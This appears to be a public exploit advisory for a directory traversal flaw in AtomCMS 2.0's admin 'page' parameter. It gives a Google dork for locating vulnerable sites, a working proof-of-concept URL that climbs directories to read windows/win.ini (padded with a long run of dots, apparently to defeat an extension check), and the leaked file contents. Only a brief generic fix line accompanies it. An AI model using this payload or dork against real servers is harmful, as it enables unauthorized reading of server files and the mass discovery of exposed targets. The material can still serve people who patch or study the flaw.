Atom CMS version 2.0 suffers from a directory traversal vulnerability.
====================================================================================================================================
| # Title : AtomCMS 2.0 Directory traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |
| # Vendor : https://github.com/thedigicraft/atomCMS/ |
| # Dork : Welcome to AtomCMS 2.0 |
====================================================================================================================================
poc :
[+] Dorking Ä°n Google Or Other Search Enggine .
[+] Directory traversal :
Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's
root directory.
[+] Affected items :
/Atom/admin/
/Atom/admin/index.php
[+] The impact of this vulnerability :
By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories.
As a result, attackers might view restricted files or execute commands, leading to a full compromise of the Web server.
[+] How to fix this vulnerability :
Your script should filter metacharacters from user input.
Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's root directory.
This vulnerability affects /Atom/admin/.
[+] Attack details :
URL encoded GET input page was set to unexisting/../../../../../../../../../../windows/win.ini....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File contents found:
; for 16-bit app support
[+] http://localhost/Atom/admin/?page=unexisting/../../../../../../../../../../windows/win.ini....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
====Greetings to :=========================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
===========================================================================================================================================
